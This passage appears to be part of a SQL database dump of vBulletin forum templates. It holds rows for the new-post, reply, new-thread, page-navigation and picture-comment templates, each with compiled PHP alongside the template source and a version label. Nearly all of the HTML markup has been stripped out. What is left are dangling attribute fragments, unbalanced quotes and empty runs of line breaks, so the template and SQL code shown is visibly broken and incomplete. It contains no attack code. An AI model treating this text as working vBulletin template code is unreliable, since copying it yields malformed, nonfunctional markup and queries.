    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876374, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1459, -1, 'newpost_attachment', '
    \r\n $vbphrase[attach_files]\r\n
    \r\n
    \r\n
    $vbphrase[valid_file_extensions]: \" . $GLOBALS[\'vbulletin\']->userinfo[\'attachmentextensions\'] . \"
    \r\n
    \r\n
    \r\n \".(($show[\'attachmentlist\']) ? (\"\r\n $attachments\r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    ', '
    \r\n $vbphrase[attach_files]\r\n
    \r\n
    \r\n
    $vbphrase[valid_file_extensions]: $bbuserinfo[attachmentextensions]
    \r\n
    \r\n
    \r\n \r\n $attachments\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    ', 'template', 1148414393, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'), (1460, -1, 'newpost_attachmentbit', '', '
    \r\n \"\"\r\n $attach[filename]\r\n ($attach[filesize])\r\n
    ', 'template', 1126014989, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'), (1461, -1, 'newpost_disablesmiliesoption', '
    \r\n', '
    \r\n', 'template', 1070081482, 'vBulletin Solutions', '', 'vbulletin'), (1462, -1, 'newpost_errormessage', '
  • $errormessage
  • ', '
  • $errormessage
  • ', 'template', 1069263001, 'vBulletin Solutions', '', 'vbulletin'), (1463, -1, 'newpost_preview', '\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'errors\']) ? (\"\r\n $vbphrase[errors_occured_when_submitted]:\r\n \") : (\"\r\n $vbphrase[preview]\r\n \")).\"\r\n
    \r\n \".(($show[\'errors\']) ? (\"\r\n \r\n
      $errorlist
    \r\n \r\n \") : (\"\r\n\r\n \".(($show[\'messageicon\'] OR $newpost[\'title\']) ? (\"\r\n \r\n
    \r\n \".(($show[\'messageicon\']) ? (\"\\\"$newpost[icontitle]\\\"\") : (\"\")).\"\r\n \".(($newpost[\'title\']) ? (\"$newpost[title]\") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n $previewmessage\r\n\r\n \".(($show[\'attachments\']) ? (\"\r\n \r\n
    \r\n\r\n \".(($show[\'thumbnailattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_thumbnails]\r\n
    \r\n $post[thumbnailattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_images]\r\n
    \r\n $post[imageattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachmentlink\']) ? (\"\r\n
    \r\n $vbphrase[attached_images]\r\n \r\n $post[imageattachmentlinks]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'otherattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_files]\r\n \r\n $post[otherattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'moderatedattachment\']) ? (\"\r\n
    \r\n $vbphrase[attachments_pending_approval]\r\n \r\n $post[moderatedattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'signature\']) ? (\"\r\n
    __________________
    \r\n $post[signature]
    \r\n \") : (\"\")).\"\r\n \")).\"\r\n
    \r\n\r\n
    ', '\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[errors_occured_when_submitted]:\r\n \r\n $vbphrase[preview]\r\n \r\n
    \r\n \r\n \r\n
      $errorlist
    \r\n \r\n \r\n\r\n \r\n \r\n
    \r\n \"$newpost[icontitle]\"\r\n $newpost[title]\r\n
    \r\n
    \r\n \r\n
    \r\n $previewmessage\r\n\r\n \r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_thumbnails]\r\n
    \r\n $post[thumbnailattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_images]\r\n
    \r\n $post[imageattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_images]\r\n \r\n $post[imageattachmentlinks]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_files]\r\n \r\n $post[otherattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attachments_pending_approval]\r\n \r\n $post[moderatedattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n \r\n
    __________________
    \r\n $post[signature]
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1219766939, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1464, -1, 'newpost_quote', '[QUOTE=$originalposter]{$pagetext}[/QUOTE]\r\n', '[QUOTE=$originalposter]{$pagetext}[/QUOTE]\r\n', 'template', 1069263046, 'vBulletin Solutions', '', 'vbulletin'), (1465, -1, 'newpost_threadmanage', '
    \r\n $vbphrase[thread_management]\r\n
    \r\n \".(($show[\'openclose\']) ? (\"
    \r\n \r\n
    \") : (\"\")).\"\r\n \".(($show[\'stickunstick\']) ? (\"\r\n
    \r\n
    \") : (\"\")).\"\r\n
    \r\n
    ', '
    \r\n $vbphrase[thread_management]\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    ', 'template', 1117066459, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'), (1466, -1, 'newpost_usernamecode', '\".(($show[\'member\']) ? (\"\r\n \r\n
    \r\n \" . construct_phrase(\"$vbphrase[logged_in_as_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \"\") . \"\r\n
    \r\n\") : (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[your_username]:\".(($_SERVER[\'REQUEST_METHOD\'] != \'POST\') ? (\"$vbphrase[click_here_to_log_in]\") : (\"\")).\"
    userinfo[\'username\'] . \"\\\" size=\\\"50\\\" style=\\\"margin-top:1px\\\" tabindex=\\\"1\\\" />
    \r\n\")).\"', '\r\n \r\n
    \r\n $vbphrase[logged_in_as_x]\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[your_username]:$vbphrase[click_here_to_log_in]
    \r\n
    ', 'template', 1203523683, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'), (1467, -1, 'newreply', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[reply_to_topic]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$postpreview\r\n\r\n
    options[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title]\r\n $vbphrase[reply_to_thread]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n $human_verify\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]:
    options[\'titlemaxchars\'] . \"\\\" tabindex=\\\"1\\\" title=\\\"$vbphrase[optional]\\\" />  \\\"$selectedicon[alt]\\\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n \".(($unquoted_post_count > 0) ? (\"\r\n
    \r\n \".(($unquoted_post_count == 1) ? (\"\r\n $vbphrase[selected_1_post_not_part_thread]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[selected_x_posts_not_part_thread]\", \"$unquoted_post_count\") . \"\r\n \")).\"\r\n
    \r\n \r\n \r\n \") : (\"\")).\"\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'signature\'] != \'\') ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $attachmentoption\r\n\r\n \".(($show[\'member\']) ? (\"\r\n
    \r\n $vbphrase[thread_subscription]\r\n \r\n \r\n \r\n \".(($show[\'subscribefolders\']) ? (\"\") : (\"\")).\"\r\n \r\n
    $vbphrase[notification_type]:
    $vbphrase[folder]:
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'threadrating\']) ? (\"\r\n
    \r\n $vbphrase[rate_thread]\r\n
    \r\n
    $vbphrase[can_add_a_score_for_thread]
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $threadmanagement\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[topic_review_newest_first]\r\n
    \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
    \r\n\r\n \r\n\r\n $threadreviewbits\r\n\r\n \".(($show[\'reviewmore\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[thread_has_more_than_x_review]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'maxposts\'] . \"\", \"showthread.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"t=$threadid\") . \"\r\n
    \r\n\r\n
    \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[reply_to_topic]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$postpreview\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] $threadinfo[title]\r\n $vbphrase[reply_to_thread]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n $human_verify\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]:
      \"$selectedicon[alt]\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n 0\">\r\n
    \r\n \r\n $vbphrase[selected_1_post_not_part_thread]\r\n \r\n $vbphrase[selected_x_posts_not_part_thread]\r\n \r\n
    \r\n \r\n \r\n
    \r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n\r\n $attachmentoption\r\n\r\n \r\n
    \r\n $vbphrase[thread_subscription]\r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[notification_type]:
    $vbphrase[folder]:
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[rate_thread]\r\n
    \r\n
    $vbphrase[can_add_a_score_for_thread]
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n $threadmanagement\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[topic_review_newest_first]\r\n
    \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
    \r\n\r\n \r\n\r\n $threadreviewbits\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n $vbphrase[thread_has_more_than_x_review]\r\n
    \r\n\r\n
    \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1210684936, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1468, -1, 'newreply_reviewbit', '\r\n $postdate $posttime\r\n\r\n\r\n $username\r\n \r\n \".(($reviewtitle) ? (\"
    $reviewtitle

    \") : (\"\")).\"\r\n $reviewmessage\r\n \r\n', '\r\n $postdate $posttime\r\n\r\n$vbphrase[post_x]\" valign=\"top\">\r\n $username\r\n \r\n
    $reviewtitle

    \r\n $reviewmessage\r\n \r\n', 'template', 1205156423, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'), (1469, -1, 'newreply_reviewbit_ignore', '$vbphrase[this_user_on_your_ignore_list]', '$vbphrase[this_user_on_your_ignore_list]', 'template', 1070145199, 'vBulletin Solutions', '', 'vbulletin'), (1470, -1, 'newreply_reviewbit_ignore_global', '\" . construct_phrase(\"$vbphrase[administrator_decided_x_quiet]\", \"$post[username]\") . \"', '$vbphrase[administrator_decided_x_quiet]', 'template', 1070145286, 'vBulletin Solutions', '', 'vbulletin'), (1471, -1, 'newthread', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[post_new_thread]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$postpreview\r\n\r\n
    options[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[forum]: session->vars[\'sessionurl\'] . \"f=$foruminfo[forumid]\\\">$foruminfo[title]\r\n $vbphrase[post_new_thread]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n $human_verify\r\n\r\n \r\n \r\n \r\n \".(($prefix_options) ? (\"\r\n \r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \".(($prefix_options) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n
    $vbphrase[prefix]:$vbphrase[title]:$vbphrase[title]:
    \r\n \r\n \r\n options[\'titlemaxchars\'] . \"\\\" tabindex=\\\"1\\\" />\r\n   \\\"$selectedicon[alt]\\\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n \".(($show[\'tag_option\']) ? (\"\r\n
    \r\n $vbphrase[tags]\r\n
    \r\n
    $vbphrase[separate_tags_using_comma]
    \r\n \r\n \".(($show[\'tags_remain\']) ? (\"
    \" . construct_phrase(\"$vbphrase[you_may_add_x_tags_to_thread]\", \"$tags_remain\") . \"
    \") : (\"\")).\"\r\n
    \r\n\r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n\r\n $posticons\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \r\n
    \r\n
    \r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'podcasturl\']) ? (\"\r\n \r\n
    \r\n $vbphrase[podcast_options]\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[podcast_url]: $vbphrase[filesize_bytes]:
     
    $vbphrase[subtitle]: $vbphrase[explicit]:
    $vbphrase[keywords]:$vbphrase[author]:
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'signature\'] != \'\') ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $attachmentoption\r\n\r\n \".(($show[\'member\']) ? (\"\r\n
    \r\n $vbphrase[thread_subscription]\r\n \r\n \r\n \r\n \".(($show[\'subscribefolders\']) ? (\"\") : (\"\")).\"\r\n \r\n
    $vbphrase[notification_type]:
    $vbphrase[folder]:
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'poll\']) ? (\"\r\n
    \r\n $vbphrase[post_a_poll]\r\n
    \r\n
    \r\n
    \".(($GLOBALS[\'vbulletin\']->options[\'maxpolloptions\']) ? (\"($vbphrase[maximum]: \" . $GLOBALS[\'vbulletin\']->options[\'maxpolloptions\'] . \")\") : (\"\")).\"
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $threadmanagement\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[post_new_thread]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$postpreview\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(this.subject.value, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[forum]: $foruminfo[title]\r\n $vbphrase[post_new_thread]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n $human_verify\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[prefix]:$vbphrase[title]:$vbphrase[title]:
    \r\n \r\n \r\n \r\n   \"$selectedicon[alt]\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message]:
    \r\n $messagearea\r\n \r\n\r\n \r\n
    \r\n $vbphrase[tags]\r\n
    \r\n
    $vbphrase[separate_tags_using_comma]
    \r\n \r\n
    $vbphrase[you_may_add_x_tags_to_thread]
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n $posticons\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n
    \r\n $vbphrase[podcast_options]\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[podcast_url]: $vbphrase[filesize_bytes]:
     
    $vbphrase[subtitle]: $vbphrase[explicit]:
    $vbphrase[keywords]:$vbphrase[author]:
    \r\n
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n\r\n $attachmentoption\r\n\r\n \r\n
    \r\n $vbphrase[thread_subscription]\r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[notification_type]:
    $vbphrase[folder]:
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[post_a_poll]\r\n
    \r\n
    \r\n
    ($vbphrase[maximum]: $vboptions[maxpolloptions])
    \r\n
    \r\n
    \r\n
    \r\n\r\n $threadmanagement\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1222256788, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'), (1472, -1, 'pagenav', '
    \r\n\r\n\r\n \r\n \".(($show[\'first\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'prev\']) ? (\"\") : (\"\")).\"\r\n $pagenav\r\n \".(($show[\'next\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'last\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n\r\n
    \" . construct_phrase(\"$vbphrase[page_x_of_y]\", \"$pagenumber\", \"$totalpages\") . \"« $vbphrase[pagenav_first]<>$vbphrase[pagenav_last] »
    \r\n
    ', '', 'template', 1249925804, 'vBulletin Solutions', '3.8.4', 'vbulletin'), (1473, -1, 'pagenav_curpage', ' $curpage\r\n ', ' $vbphrase[showing_results_x_to_y_of_z]\">$curpage\r\n ', 'template', 1070082250, 'vBulletin Solutions', '', 'vbulletin'), (1474, -1, 'pagenav_pagelink', '$curpage', '&page=$curpage
    #$anchor\" title=\"$vbphrase[show_results_x_to_y_of_z]\">$curpage', 'template', 1194866578, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1475, -1, 'pagenav_pagelinkrel', '$curpage', '&page=$curpage
    #$anchor\" title=\"$vbphrase[show_results_x_to_y_of_z]\">$curpage', 'template', 1194866600, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1476, -1, 'picturecomment_commentarea', '\".(($picturecomment_form OR $picturecommentbits) ? (\"\r\n
    \r\n\r\n
    \r\n \".(($picturecommentbits) ? (\"\r\n
    \r\n \".(($show[\'inlinemod\']) ? (\" \") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[showing_pcs_x_to_y_of_z]\", \"$messagestats[start]\", \"$messagestats[end]\", \"$messagestats[total]\") . \"\r\n
    \r\n\r\n \r\n
    \r\n
    \r\n\r\n
      \r\n $picturecommentbits\r\n
    \r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n
    \r\n \r\n \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($pagenav) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n \".(($show[\'approve\'] OR $show[\'undelete\']) ? (\"
    • options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"1\\\" height=\\\"1\\\" />
    • \") : (\"\")).\"\r\n \".(($show[\'approve\']) ? (\"
    • $vbphrase[select_unapproved_posts]
    • \") : (\"\")).\"\r\n \".(($show[\'undelete\']) ? (\"
    • $vbphrase[select_deleted_posts]
    • \") : (\"\")).\"\r\n
    \r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($picturecomment_form) ? (\"\r\n
    $vbphrase[post_comment]
    \r\n $picturecomment_form\r\n \") : (\"\")).\"\r\n\r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickcomment\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'edit\'] AND $show[\'popups\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[vbulletin_message]\r\n
     
    $vbphrase[cancel_changes]
    \r\n\r\n\") : (\"\")).\"', '\r\n
    \r\n\r\n
    \r\n \r\n
    \r\n  \r\n $vbphrase[showing_pcs_x_to_y_of_z]\r\n
    \r\n\r\n \r\n
    \r\n
    \r\n\r\n
      \r\n $picturecommentbits\r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n
    • \"\"
    • \r\n
    • $vbphrase[select_unapproved_posts]
    • \r\n
    • $vbphrase[select_deleted_posts]
    • \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    first_row\">$vbphrase[post_comment]
    \r\n $picturecomment_form\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[vbulletin_message]\r\n
     
    $vbphrase[cancel_changes]
    \r\n\r\n
    ', 'template', 1218204843, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1477, -1, 'picturecomment_css', '', '', 'template', 1203537558, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'), (1478, -1, 'picturecomment_deletemessages', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[delete_messages]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_messages]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n \".(($show[\'deleteoption\']) ? (\"\r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n \") : (\"\")).\"\r\n \".(($show[\'deletemessages\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'removemessages\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deletemessages\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_messages_from_y_pictures]\", \"$messagecount\", \"$picturecount\") . \"
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[delete_messages]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_messages]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n \r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[deleting_x_messages_from_y_pictures]
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
